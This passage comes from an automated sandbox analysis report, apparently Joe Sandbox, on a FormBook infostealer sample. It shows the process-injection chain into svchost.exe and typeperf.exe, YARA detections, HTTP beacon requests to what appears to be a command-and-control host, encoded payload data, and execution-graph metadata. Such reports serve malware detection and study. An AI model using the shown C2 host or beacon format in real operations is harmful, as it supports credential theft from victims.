                                                                                                                Data Raw: 5a 5a 59 3d 6d 6b 74 47 62 69 64 57 7a 41 47 65 44 76 6d 78 79 73 53 61 58 79 79 37 57 38 4a 31 77 2b 73 73 59 76 4d 63 6b 33 6c 37 2b 79 2f 4b 41 4c 55 51 69 65 2f 51 31 4c 68 75 61 32 70 50 59 67 75 67 68 6b 79 6f 48 77 45 70 54 4a 37 2b 48 54 68 6d 4d 33 79 5a 75 35 51 71 45 48 35 6c 63 4e 63 54 74 4b 6d 33 52 46 39 65 5a 33 49 64 57 45 55 49 4d 73 4e 67 62 73 78 48 54 77 62 34 6d 55 33 67 75 32 50 53 73 6b 6a 45 57 42 55 45 6b 44 4c 6f 58 79 78 73 75 6a 74 69 56 6c 48 63 6f 55 75 37 79 44 6a 66 6a 62 6f 31 53 31 31 62 48 38 68 54 34 76 4c 4e 31 39 39 55 6a 55 62 30 31 73 72 4a 4d 34 58 36 4c 49 41 63 76 6c 59 59 42 2f 46 44 36 74 44 30 2b 48 57 37 6c 4c 70 72 2b 68 64 38 37 75 72 7a 6d 4e 38 4b 38 4a 6e 4d 31 6b 74 46 6d 41 46 6a 44 59 35 47 52 56 69 45 6b 32 74 68 7a 67 72 79 4c 2f 46 77 5a 42 6b 35 6e 33 6c 45 65 54 38 4a 4e 49 36 75 65 33 2b 30 65 6f 76 6a 52 61 56 51 33 48 6f 72 73 69 53 4d 64 7a 2f 65 66 48 6c 33 43 56 37 55 62 49 37 6c 56 5a 71 35 48 56 59 76 4a 38 56 52 47 71 76 59 43 4c [TRUNCATED]
                                                                                                                Data Ascii: ZZY=mktGbidWzAGeDvmxysSaXyy7W8J1w+ssYvMck3l7+y/KALUQie/Q1Lhua2pPYgughkyoHwEpTJ7+HThmM3yZu5QqEH5lcNcTtKm3RF9eZ3IdWEUIMsNgbsxHTwb4mU3gu2PSskjEWBUEkDLoXyxsujtiVlHcoUu7yDjfjbo1S11bH8hT4vLN199UjUb01srJM4X6LIAcvlYYB/FD6tD0+HW7lLpr+hd87urzmN8K8JnM1ktFmAFjDY5GRViEk2thzgryL/FwZBk5n3lEeT8JNI6ue3+0eovjRaVQ3HorsiSMdz/efHl3CV7UbI7lVZq5HVYvJ8VRGqvYCL15LQP/NySkBw6K60Yp1eFdSjTKMtEcqmRx0zshgO8RFam+x8PEVowkIctdyUg+7Jwp/OMFAiL7TX4KvziIYvewOzLrEH/GvqdAgjZuwSmd7FeX5gXjen99EzfgD0UP0E8B/3Oa/maBNdKAhtfd94AQPeQb1lUBT0UOnm44IeEH4Fbs420cI09dSQowznfEFutpm26BgMUTdgPw6d1/a2uhtThWAKckRNRbs8FMQ0yaAv6oVKDXhJG20AGdb+ZVl6zrU07pTdp6ATJgT2k2OLbBfTdfkyXFFcfUbFZQ12/cGghvAg0nlwu8YVqwAFo7y992SeE+KYNzxW6OkWRQu/wue1XXZMvWTgTOYcuB6gRfTTGbVJMTWEttNXbfOm71YEgV8TgtskU3GgrqwOBdYrSRDbt/zLb5w1W7Gl0y8p2/PQ5P7/kV+U1F0k9rMvGM7s+cp3vT7STQySn0j5fF3mQFldgDYfT/pXQR/BV3BN9J16wA7TrM0NUpkwmM5eJtTKpdRQHOLhKUsT4nXwjRShSucMEGaLy76NJrb+79c+vOAmIiYXQe9ebggPYIyyDF03Z47r5cGR2f2mVgh8SjAZZ6H3dN1s5+W8/L+BRfInC5mAxWHsW8nwuVsPg4YrKYS9pXYB4/3ES1U3cOLLqoY8DJeo29fOBqrmEs [TRUNCATED]


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                44192.168.2.7500163.33.130.190801104C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Oct 9, 2024 14:09:00.683294058 CEST422OUTGET /eysm/?ZZY=rmFmYSV40EyuHaS2kdWsBSatZMcowP18dPlfx0Yf8gPpQKE966Dkx6Jhfns0QUWGli+3EHMWEp7NMhxdNQGBoYEKFyRFG/hWuIrsEVQcMyBNET9pI9FmSsALbFuO7R/DpXmPiDL0RAp8&mHm0o=rrqhoH HTTP/1.1
                                                                                                                Host: www.allthingsjasmin.com
                                                                                                                Accept: */*
                                                                                                                Accept-Language: en-US,en
                                                                                                                Connection: close
                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
                                                                                                                Oct 9, 2024 14:09:01.139355898 CEST412INHTTP/1.1 200 OK
                                                                                                                Server: openresty
                                                                                                                Date: Wed, 09 Oct 2024 12:09:01 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 272
                                                                                                                Connection: close
                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 5a 5a 59 3d 72 6d 46 6d 59 53 56 34 30 45 79 75 48 61 53 32 6b 64 57 73 42 53 61 74 5a 4d 63 6f 77 50 31 38 64 50 6c 66 78 30 59 66 38 67 50 70 51 4b 45 39 36 36 44 6b 78 36 4a 68 66 6e 73 30 51 55 57 47 6c 69 2b 33 45 48 4d 57 45 70 37 4e 4d 68 78 64 4e 51 47 42 6f 59 45 4b 46 79 52 46 47 2f 68 57 75 49 72 73 45 56 51 63 4d 79 42 4e 45 54 39 70 49 39 46 6d 53 73 41 4c 62 46 75 4f 37 52 2f 44 70 58 6d 50 69 44 4c 30 52 41 70 38 26 6d 48 6d 30 6f 3d 72 72 71 68 6f 48 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?ZZY=rmFmYSV40EyuHaS2kdWsBSatZMcowP18dPlfx0Yf8gPpQKE966Dkx6Jhfns0QUWGli+3EHMWEp7NMhxdNQGBoYEKFyRFG/hWuIrsEVQcMyBNET9pI9FmSsALbFuO7R/DpXmPiDL0RAp8&mHm0o=rrqhoH"}</script></head></html>


                                                                                                                Statistics

                                                                                                                CPU Usage

                                                                                                                Click to jump to process

                                                                                                                Memory Usage

                                                                                                                Click to jump to process

                                                                                                                High Level Behavior Distribution

                                                                                                                Click to dive into process behavior distribution

                                                                                                                Behavior

                                                                                                                Click to jump to process

                                                                                                                System Behavior

                                                                                                                General

                                                                                                                Target ID:3
                                                                                                                Start time:08:04:55
                                                                                                                Start date:09/10/2024
                                                                                                                Path:C:\Users\user\Desktop\sa7Bw41TUq.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\user\Desktop\sa7Bw41TUq.exe"
                                                                                                                Imagebase:0x400000
                                                                                                                File size:1'364'575 bytes
                                                                                                                MD5 hash:6CD77B30F320ED9E0E515073E1175898
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:9
                                                                                                                Start time:08:05:03
                                                                                                                Start date:09/10/2024
                                                                                                                Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\user\Desktop\sa7Bw41TUq.exe"
                                                                                                                Imagebase:0x2b0000
                                                                                                                File size:46'504 bytes
                                                                                                                MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.1688985587.0000000009690000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.1688985587.0000000009690000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.1671982092.00000000067E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.1671982092.00000000067E0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.1670445021.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.1670445021.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:11
                                                                                                                Start time:09:58:17
                                                                                                                Start date:09/10/2024
                                                                                                                Path:C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe"
                                                                                                                Imagebase:0xfa0000
                                                                                                                File size:140'800 bytes
                                                                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3737482520.0000000004BE0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.3737482520.0000000004BE0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                                Reputation:high
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:12
                                                                                                                Start time:09:58:23
                                                                                                                Start date:09/10/2024
                                                                                                                Path:C:\Windows\SysWOW64\typeperf.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Windows\SysWOW64\typeperf.exe"
                                                                                                                Imagebase:0xd90000
                                                                                                                File size:41'984 bytes
                                                                                                                MD5 hash:93925D4F55465CFC73C4CDF7F8B1F375
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3737461666.0000000000BB0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.3737461666.0000000000BB0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3737315515.0000000000B60000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.3737315515.0000000000B60000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3725825178.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.3725825178.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                Reputation:moderate
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:14
                                                                                                                Start time:09:58:37
                                                                                                                Start date:09/10/2024
                                                                                                                Path:C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe"
                                                                                                                Imagebase:0xfa0000
                                                                                                                File size:140'800 bytes
                                                                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.3739752184.0000000004DC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.3739752184.0000000004DC0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                Reputation:high
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:16
                                                                                                                Start time:09:58:49
                                                                                                                Start date:09/10/2024
                                                                                                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                Imagebase:0x7ff722870000
                                                                                                                File size:676'768 bytes
                                                                                                                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Disassembly

                                                                                                                Reset < >

                                                                                                                  Execution Graph

                                                                                                                  Execution Coverage:1.4%
                                                                                                                  Dynamic/Decrypted Code Coverage:5%
                                                                                                                  Signature Coverage:8.3%
                                                                                                                  Total number of Nodes:120
                                                                                                                  Total number of Limit Nodes:7
                                                                                                                  execution_graph 77021 42bd23 77022 42bd3d 77021->77022 77025 3c72df0 LdrInitializeThunk 77022->77025 77023 42bd65 77025->77023 77026 424e83 77027 424e9c 77026->77027 77028 424ee7 77027->77028 77031 424f2a 77027->77031 77033 424f2f 77027->77033 77034 42e7f3 77028->77034 77032 42e7f3 RtlFreeHeap 77031->77032 77032->77033 77037 42ca83 77034->77037 77036 424ef7 77038 42caa0 77037->77038 77039 42cab1 RtlFreeHeap 77038->77039 77039->77036 77046 42fa13 77047 42e7f3 RtlFreeHeap 77046->77047 77048 42fa28 77047->77048 77049 42e8d3 77052 42ca33 77049->77052 77051 42e8ee 77053 42ca4d 77052->77053 77054 42ca5e RtlAllocateHeap 77053->77054 77054->77051 77055 424af3 77056 424b0f 77055->77056 77057 424b37 77056->77057 77058 424b4b 77056->77058 77059 42c723 NtClose 77057->77059 77065 42c723 77058->77065 77061 424b40 77059->77061 77062 424b54 77068 42e913 RtlAllocateHeap 77062->77068 77064 424b5f 77066 42c740 77065->77066 77067 42c751 NtClose 77066->77067 77067->77062 77068->77064 77069 414173 77070 41418d 77069->77070 77075 417903 77070->77075 77072 4141ab 77073 4141f0 77072->77073 77074 4141df PostThreadMessageW 77072->77074 77074->77073 77076 417927 77075->77076 77077 41792e 77076->77077 77078 417973 LdrLoadDll 77076->77078 77077->77072 77078->77077 77079 41b433 77080 41b466 77079->77080 77081 42c723 NtClose 77080->77081 77082 41b498 77080->77082 77081->77082 77083 41e633 77084 41e659 77083->77084 77088 41e74d 77084->77088 77089 42fa53 RtlAllocateHeap RtlFreeHeap 77084->77089 77086 41e6eb 77086->77088 77090 42bd73 77086->77090 77089->77086 77091 42bd90 77090->77091 77094 3c72c0a 77091->77094 77092 42bdbc 77092->77088 77095 3c72c11 77094->77095 77096 3c72c1f LdrInitializeThunk 77094->77096 77095->77092 77096->77092 77040 414204 77041 4141b6 77040->77041 77044 41420f 77040->77044 77042 4141f0 77041->77042 77043 4141df PostThreadMessageW 77041->77043 77043->77042 77097 401a95 77098 401a99 77097->77098 77101 42fe83 77098->77101 77104 42e3a3 77101->77104 77105 42e3c9 77104->77105 77116 407523 77105->77116 77107 42e3df 77115 401b89 77107->77115 77119 41b243 77107->77119 77109 42e3fe 77110 42e413 77109->77110 77134 42cad3 77109->77134 77130 4283f3 77110->77130 77113 42e42d 77114 42cad3 ExitProcess 77113->77114 77114->77115 77118 407530 77116->77118 77137 4165b3 77116->77137 77118->77107 77120 41b26f 77119->77120 77148 41b133 77120->77148 77123 41b2b4 77125 41b2d0 77123->77125 77128 42c723 NtClose 77123->77128 77124 41b29c 77126 41b2a7 77124->77126 77127 42c723 NtClose 77124->77127 77125->77109 77126->77109 77127->77126 77129 41b2c6 77128->77129 77129->77109 77131 428455 77130->77131 77133 428462 77131->77133 77159 418773 77131->77159 77133->77113 77135 42caf0 77134->77135 77136 42cb01 ExitProcess 77135->77136 77136->77110 77138 4165d0 77137->77138 77140 4165e9 77138->77140 77141 42d173 77138->77141 77140->77118 77143 42d18d 77141->77143 77142 42d1bc 77142->77140 77143->77142 77144 42bd73 LdrInitializeThunk 77143->77144 77145 42d21c 77144->77145 77146 42e7f3 RtlFreeHeap 77145->77146 77147 42d235 77146->77147 77147->77140 77149 41b229 77148->77149 77150 41b14d 77148->77150 77149->77123 77149->77124 77154 42be13 77150->77154 77153 42c723 NtClose 77153->77149 77155 42be30 77154->77155 77158 3c735c0 LdrInitializeThunk 77155->77158 77156 41b21d 77156->77153 77158->77156 77160 41879d 77159->77160 77161 42e7f3 RtlFreeHeap 77160->77161 77164 418c9b 77160->77164 77162 4188d6 77161->77162 77163 42cad3 ExitProcess 77162->77163 77162->77164 77163->77164 77164->77133 77045 3c72b60 LdrInitializeThunk 77165 418eb8 77166 42c723 NtClose 77165->77166 77167 418ec2 77166->77167

                                                                                                                  Executed Functions

                                                                                                                  Function 00401540 Relevance: 6.8, Strings: 5, Instructions: 584COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670445021.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: )F$2b$I$K_$m~
                                                                                                                  • API String ID: 0-409131162
                                                                                                                  • Opcode ID: 81eb4d4ce7ba30cbbb4e804efc00288aba6f8940184d0f56b8887f88f96e5ed0
                                                                                                                  • Instruction ID: 5c77b32fdf5f580625ca62357abd71528a00badf8bbe157a9e88a45299b38899
                                                                                                                  • Opcode Fuzzy Hash: 81eb4d4ce7ba30cbbb4e804efc00288aba6f8940184d0f56b8887f88f96e5ed0
                                                                                                                  • Instruction Fuzzy Hash: D51299769012828BC7219F74C8542DAFFB1FF96704B1845BFD491AF3A2D33A5846CB89
                                                                                                                  Function 00418773 Relevance: 2.9, Strings: 2, Instructions: 436COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 242 418773-4187e7 call 42e893 * 3 call 404bb3 call 424493 253 418ca6-418caa 242->253 254 4187ed-418817 call 42e843 242->254 257 418822 254->257 258 418819-418820 254->258 259 418824-41882e 257->259 258->259 260 418830 259->260 261 41884f-418861 call 4244c3 259->261 262 418833-418836 260->262 268 418ca4-418ca5 261->268 269 418867-41887f call 42e1f3 261->269 264 418838-41883b 262->264 265 41883f-418849 262->265 264->262 267 41883d 264->267 265->261 267->261 268->253 269->268 272 418885-4188c9 call 413de3 269->272 272->268 275 4188cf-4188ef call 42e7f3 272->275 278 4188f1-4188f3 275->278 279 418920-418922 275->279 281 41892b-41894d call 41b2e3 278->281 282 4188f5-418903 call 42dd63 call 407063 278->282 280 418924 279->280 279->281 280->281 281->268 287 418953-418975 call 42bf43 281->287 290 418908-41890d 282->290 291 41897a-41897f 287->291 290->279 292 41890f-41891e 290->292 291->268 293 418985-4189fc call 42b8e3 call 42b993 call 42e843 291->293 292->293 300 418a05 293->300 301 4189fe-418a03 293->301 302 418a07-418a37 300->302 301->302 303 418a3d 302->303 304 418b1f 302->304 305 418a43-418a49 303->305 306 418b21 304->306 307 418a4b-418a4e 305->307 308 418a5a-418a7b call 42e843 305->308 309 418b28-418b2c 306->309 307->305 310 418a50-418a55 307->310 316 418a87 308->316 317 418a7d-418a85 308->317 312 418b32-418b36 309->312 313 418b2e-418b30 309->313 310->306 312->309 313->312 315 418b38-418b4c 313->315 318 418bb9-418c09 call 417883 * 2 call 42e813 315->318 319 418b4e-418b51 315->319 320 418a8a-418a9f 316->320 317->320 350 418c0b-418c0f 318->350 351 418c2e-418c33 318->351 322 418b54-418b59 319->322 325 418aa1 320->325 326 418ab2-418af3 call 417803 call 42e843 320->326 323 418b70-418b74 322->323 324 418b5b-418b5e 322->324 323->322 331 418b76-418b78 323->331 324->323 330 418b60-418b62 324->330 332 418aa4-418aa7 325->332 348 418af5-418afa 326->348 349 418afc 326->349 330->323 335 418b64-418b67 330->335 331->318 336 418b7a-418b83 331->336 337 418ab0 332->337 338 418aa9-418aac 332->338 335->323 341 418b69 335->341 342 418b85-418b88 336->342 337->326 338->332 343 418aae 338->343 341->323 346 418bb3-418bb7 342->346 347 418b8a-418b8d 342->347 343->326 346->318 346->342 347->346 352 418b8f-418b91 347->352 353 418afe-418b1d call 414d33 348->353 349->353 354 418c11-418c22 call 4070d3 350->354 355 418c3b-418c4d call 42baf3 350->355 351->355 356 418c35 351->356 352->346 357 418b93-418b96 352->357 353->306 362 418c27-418c2c 354->362 365 418c53-418c68 call 41b4b3 355->365 356->355 357->346 361 418b98-418bb1 357->361 361->346 362->351 362->365 368 418c6a-418c96 call 417803 * 2 call 42cad3 365->368 374 418c9b-418c9e 368->374 374->268
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670445021.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: >$>
                                                                                                                  • API String ID: 0-3778932101
                                                                                                                  • Opcode ID: ca422f8d884042845518030b4bc6570aed558962bb3f05b996a0a83d81ac827b
                                                                                                                  • Instruction ID: fcfb32f9a52c9894804c28a7b06b074eca563cc1d4dee10d1b80ef1207b7c0fa
                                                                                                                  • Opcode Fuzzy Hash: ca422f8d884042845518030b4bc6570aed558962bb3f05b996a0a83d81ac827b
                                                                                                                  • Instruction Fuzzy Hash: 6FF1A4B0D00219AFDF24DFA5CC85AEEB7B8AF44304F1481AEE505A7341DB746A85CFA5
                                                                                                                  Function 00417903 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 462 417903-41792c call 42f4f3 465 417932-417940 call 42faf3 462->465 466 41792e-417931 462->466 469 417950-417953 465->469 470 417942-41794d call 42fd93 465->470 472 417959-417961 469->472 473 417954 call 42de73 469->473 470->469 476 417963-417977 LdrLoadDll 472->476 477 41797a-41797d 472->477 473->472 476->477
                                                                                                                  APIs
                                                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417975
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670445021.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Load
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2234796835-0
                                                                                                                  • Opcode ID: d8763b518fa0a11acd9d080d14419e451ef2295721058bd5ab11b5c6820eec4f
                                                                                                                  • Instruction ID: 463929d66597bbdaf13c54431a151a5f51b2f75f5e6c757c6cf807a4193d1843
                                                                                                                  • Opcode Fuzzy Hash: d8763b518fa0a11acd9d080d14419e451ef2295721058bd5ab11b5c6820eec4f
                                                                                                                  • Instruction Fuzzy Hash: 740152F1E4020DA7DB10DBE5DC42FDEB778AB14308F4041A6E90897240F675EB488B95
                                                                                                                  Function 0042C723 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 484 42c723-42c75f call 404973 call 42d963 NtClose
                                                                                                                  APIs
                                                                                                                  • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C75A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670445021.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Close
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3535843008-0
                                                                                                                  • Opcode ID: 1c2f88292d7e2c6a30bddc2025e466cfd1a3a60594c20167d31e2f8787f4076b
                                                                                                                  • Instruction ID: 31899bdf6a2e9aaa1cbd5152e6067e72ddadf3aca3993b7b6181c46ac3afa756
                                                                                                                  • Opcode Fuzzy Hash: 1c2f88292d7e2c6a30bddc2025e466cfd1a3a60594c20167d31e2f8787f4076b
                                                                                                                  • Instruction Fuzzy Hash: 91E08C763402147BD620EA6ADC42F9BB76DDFC5B14F00442BFA18A7242CAB1B91187F4
                                                                                                                  Function 03C735C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2994545307-0
                                                                                                                  • Opcode ID: 5bca34654696f2cbbf3747880e1d8e7bff62dc23291a9053aa2bdc52fdc656fb
                                                                                                                  • Instruction ID: f1b3a564e57d8db6d791bfe30329b27628126f33dd2ff5f3408a1d0e42f20d15
                                                                                                                  • Opcode Fuzzy Hash: 5bca34654696f2cbbf3747880e1d8e7bff62dc23291a9053aa2bdc52fdc656fb
                                                                                                                  • Instruction Fuzzy Hash: 7D90027160560802D101B2584554786100687D0705FA6C411A042C5ACD87958B5165A2
                                                                                                                  Function 03C72B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2994545307-0
                                                                                                                  • Opcode ID: 177a777725175a310be796602bea5ce4e703806b62e828f0dd9dbdf77bb4c699
                                                                                                                  • Instruction ID: a7d954574f12c2a64cadd64d7e6835217944f3637fb12dd8db4a44f45c985589
                                                                                                                  • Opcode Fuzzy Hash: 177a777725175a310be796602bea5ce4e703806b62e828f0dd9dbdf77bb4c699
                                                                                                                  • Instruction Fuzzy Hash: B09002A1202504034106B2584454696400B87E0705B96C021E101C5D4DC6258A916125
                                                                                                                  Function 03C72DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2994545307-0
                                                                                                                  • Opcode ID: a8962f70cba8c53e356e32ee86b3fe82e696817c8a9c7b6f7a4d94c0892e40e6
                                                                                                                  • Instruction ID: 4f6675d3e3273099332e0c4ed8d15174d0278e718619d66f0ff73dc14f53d2cb
